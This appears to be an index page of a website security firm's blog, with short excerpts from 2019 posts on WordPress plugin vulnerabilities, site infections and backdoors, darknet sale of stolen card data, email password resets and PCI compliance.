- Free Website Security Consultation for GoDaddy Pros 10 May 2019
Sucuri is partnering with GoDaddy Pro to make the internet more secure, one website professional at a time. Developers, designers, agencies, and freelancers now have an exclusive avenue to level up security knowledge and differentiate their businesses from the competition.
GoDaddy Pro helps web developers and designers save time and money while managing multiple websites. The free membership includes extensive training materials, automation of routine maintenance tasks, and consolidated client management tools.
- Persistent XSS via CSRF in WP Meta and Date Remover 7 May 2019
During regular research audits for our Sucuri Firewall (WAF), we discovered a Cross Site Request Forgery (CSRF) leading to a persistent Cross Site Scripting vulnerability affecting 70,000+ users of the WP Meta and Date Remover plugin for WordPress.
Disclosure / Response Timeline:
- April 30 – Initial contact attempt
- May 07 – Patch is live
Are You at Risk?
This vulnerability requires some level of social engineering to be exploited.
- Replica Spam on Poorly Maintained ASP Site 6 May 2019
Although the majority of sites we work on are powered by PHP, we still have clients whose sites use other programming languages.
The other day we cleaned an ASP site where we found a web.config file (the ASP.NET version of .htaccess) with these instructions:
<add value="view.asp" />
<add value="Default.asp" />
<add value="index.htm" />
<add value="index.html" />
<add value="iisstart.htm" />
<add value="default.aspx" />
<add value="index.asp" />
<add value="index.aspx" />
- Cronjob Backdoors 3 May 2019
Attackers commonly rely on backdoors to easily gain reentry and maintain control over a website. They also use PHP functions to further deepen the level of their backdoors.
A good example of this is the shell_exec function which allows plain shell commands to be run directly through the web application, providing attackers with an increased level of control over the environment.
Backdoor in Cron
While investigating a client with repeated website infections, we came across a scenario where a cron job was being used to reinfect the site.
- How Stolen Ecommerce Data is Sold on the Darknet 1 May 2019
We have recently published posts regarding banking malware and some of the ways it uses compromised websites to infect victim’s devices (smartphones, computers, POS terminals).
Now let us look into some of the methods that cybercriminals use to monetize stolen information like bank accounts, credit cards, and personal information.
Infected Ecommerce Website to Darknet Markets
It’s important to note that one of the most popular topics discussed among cybercriminals is their opsec (operations security).
- Insufficient Privilege Validation in WooCommerce Checkout Manager 29 April 2019
Due to the poor handling of a vulnerability disclosure, a new attack vector has appeared for the WooCommerce Checkout Manager WordPress plugin and is affecting over 60,000 sites. If you are using this plugin, we recommend that you update it to version 4.3 immediately.
As we’ve seen some exploit attempts occurring in the wild, we feel it is a good time to describe what the issue is.
Current State of the Vulnerability
This arbitrary file upload vulnerability was made public a few weeks ago and has recently been patched.
- Typo 3 Spam Infection 26 April 2019
Here at Sucuri most of the malware that we deal with is on CMS platforms like:
- and others.
But every now and then we come across something a little different.
Blackhat SEO Infection in Typo3
Just recently, I discovered a website using the Typo3 CMS that had been infected with a blackhat SEO spam infection:
Before I begin, according to websitesetup.org, Typo3 is currently the 8th most widely used CMS platform on the web, so I’m surprised I had never seen an infection with this software before, but it looks like over half a million websites on the web use Typo3.
- Plugins Added to Malicious Campaign 25 April 2019
We continue to see an increase in the number of plugins attacked as part of a campaign that’s been active for quite a long time. Bad actors have added more vulnerable plugins to inject similar malicious scripts.
Plugins Added to the Attack
- Download WP Inventory Manager (version <= 1.8.2)
- Woocommerce User Email Verification. (version <= 3.3.0 **Still Not Fixed**)
Attackers are trying to exploit vulnerable versions of these plugins.
- Sucuri’s 10th Anniversary 24 April 2019
It feels like yesterday, but it has been 10 years since the domain sucuri.net was registered.
Happy 10th Birthday, Sucuri!
For us, 2009 marks the birth of the brand as it represents the day when the open-source project secured its name. The first Sucuri service was originally called NBIM (Network Based Integrity Monitoring).
Sucuri intended to be an interface for the NBIM project. It allowed anyone to monitor websites for changes in content, WHOIS & DNS.
- Reset Email Account Passwords After a Website Malware Infection 22 April 2019
It’s not uncommon for bad actors to use compromised websites to send large amounts of email spam. This can cause major headaches for website owners — spam can lead to the blacklisting of a web host’s mail server IPs, or the domain name itself may be placed on blacklists like Spamhaus DBL.
Reset Email Passwords After a Website Hack
Blacklisting is problematic. It has serious consequences for a website’s reputation, may impact sales and revenue, and it can be a tedious process to remove a domain from a blacklist authority.
- PCI for SMB: Requirement 12 – Maintain an Information Security Policy 19 April 2019
Update: Read our new PCI Compliance guide.
Welcome to the final post to conclude our series on understanding the Payment Card Industry Data Security Standard–PCI DSS. We want to show how PCI DSS affects anyone going through the compliance process using the PCI SAQ’s (Self Assessment Questionnaires).
In the previous articles written about PCI, we covered the following:
- Requirement 1: Build and Maintain a Secure Network – Install and maintain a firewall configuration to protect cardholder data.